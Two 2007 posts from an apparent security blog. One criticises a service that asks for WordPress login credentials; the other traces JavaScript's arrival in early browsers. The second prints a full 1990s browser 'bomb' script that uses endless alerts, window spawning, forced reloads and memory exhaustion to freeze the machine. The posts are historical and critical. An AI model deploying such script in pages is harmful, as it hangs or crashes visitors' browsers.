Technorati Quick Claim – May I have your username and password please?

Gilbert Verdian — Fri, 13 Jul 2007 13:49:23 +0000

As I’m required to write this post to verify my blog using the traditional “Post Claim”, thought I might as well talk a little about it.

In setting up my blog in technorati, they have a new option to do a “Quick Claim” to prove that you own this blog. This entails to give them your username and password to wordpress to log in and verify the blog. But don’t worry..

Note: Remember to use the username and password for your WordPress account, not your Technorati account. This will only be used once to verify that you own the blog. It will not be stored in our system.

Does anyone else see the problem with this? Here you go, here’s my wordpress login and password. Although it’s not “stored” in their system according to technorati, the details you input would have to be placed somewhere on disk (in a db?) or at least memory for the bots to read it and try to login to verify things. So what happens after it is read?

I know other online services such as google analytics, require you to upload a specific text file to the root of your site with only a key in the contents, which they then do a GET /file1234.html to verify that you own the site. Surely this is a better way, although a little more technical work is needed.

The Origins of Scripting Web Vulnerabilities in our Browsers

Gilbert Verdian — Thu, 12 Jul 2007 13:48:48 +0000

I was thinking of the current situation we are experiencing in Web vulnerabilities specifically with scripting and javascript. So I searched to find the source of when our browsers started to incorporate javascript and found the following:

- Netscape 2.0 was the first version of Netscape to have javascript support – It was released in March 1996 http://wp.netscape.com/eng/mozilla/2.0/relnotes/windows-2.0.html
- “Netscape version 2.0 introduced a bevy of must-have breakthrough features (frames, Java, Javascript and Plug-ins) which helped distance it from the pack…”
http://www.eskimo.com/~bloo/indexdot/history/netscape.htm

The following slides have good background information on the javascript implementation:
http://www.geom.uiuc.edu/~slevy/si/u_pkg_java102/docs/javaone/industry/JavaScri.pdf

On the Internet Explorer side, it was IE 3.0 released August 1996 which incorporated javascript. Just as important, they also included VBScript.

“Version 3 included Internet Mail and News 1.0 and the Windows Address Book. It also brought the browser much closer to the bar that had been set by Netscape, including the support of Netscape’s plugins technology (NPAPI), ActiveX,frames, and a reverse-engineered version of JavaScript named JScript. Later, Microsoft NetMeeting and Windows Media Player were integrated into the product and thus helper applications became not as necessary as they once were. Cascading Style Sheets (CSS) were also introduced with version 3 of Internet Explorer.” – http://en.wikipedia.org/wiki/History_of_Internet_Explorer

It wasn’t long after this time where people found ways to abuse Javascript

[SCRIPT LANGUAGE="JavaScript"]


function AnnoyingButton()

{

   while (true)

       window.alert("We have taken your Netscape session hostage.  Now give us your money, the girl and everything else you got or we're going to break your legs.")

}
// Keep opening windows over and over again

function WindowBomb()

{

    var iCounter = 0    // dummy counter
    while (true)

      {

        window.open("http://www.netscape.com","CRASHING" + iCounter,"width=1,height=1,resizable=no")

        iCounter++

      }

}
// Not as interesting as the other bombs, but this one forces the user to

// stay at the current page.  User cannot switch to another page, or click

// stop to stop the reloading.

function ReloadBomb()

{

   history.go(0)                         // reload this page

   window.setTimeout('ReloadBomb()',1)   // tell netscape to hit this function

                                         // every milisecond =)

}
// Not a very interesting bomb, it does nothing really :>

function WhileLoopLock()

{

   while (true){}
}
var szEatMemory = "GOBBLEGOBBLE"  // our string to consume our memory
// Now this function EatMemoryInTime is a interesting one that could be

// placed on a timer for maximum nastiness :>  I have been able to get

// up to 4Megs consumed by Netscape forcing my machine to crawl =)

// AND it's time driven!  No while loops here!

function EatMemoryInTime()

{

    szEatMemory = szEatMemory + szEatMemory                    // keep appending

    window.status = "String Length is: " + szEatMemory.length  // report size

    window.setTimeout('EatMemoryInTime()',1);                  // tell netscape to hit this function

}
var iNumberOfIterations = 0;
// The Timeout bomb sets up 4 timers which then call itself again, and again

// watch the status bar to see how man times this function gets called.

function TimeBomb()

{

  window.status = "TimeBomb has been executed: " + iNumberOfIterations++ + " times";

  window.setTimeout('TimeBomb()',1000);

  window.setTimeout('TimeBomb()',1000);

  window.setTimeout('TimeBomb()',1000);

  window.setTimeout('TimeBomb()',1000);

}

[/SCRIPT]

The above is a script from around that time which chews up CPU and memory, forcing you to do a hard reset in Windows 95.

And so over 10 years later, scripting which was designed to enhance our web experience, is still being abused today, but in much different ways that assist in monetary gain for malicious purposes.

Maybe its time we re-architect our browsers and re-think how we should experience the web all over again?

Gilbert Verdian - I Secure Enterprises » web security

Technorati Quick Claim – May I have your username and password please?

The Origins of Scripting Web Vulnerabilities in our Browsers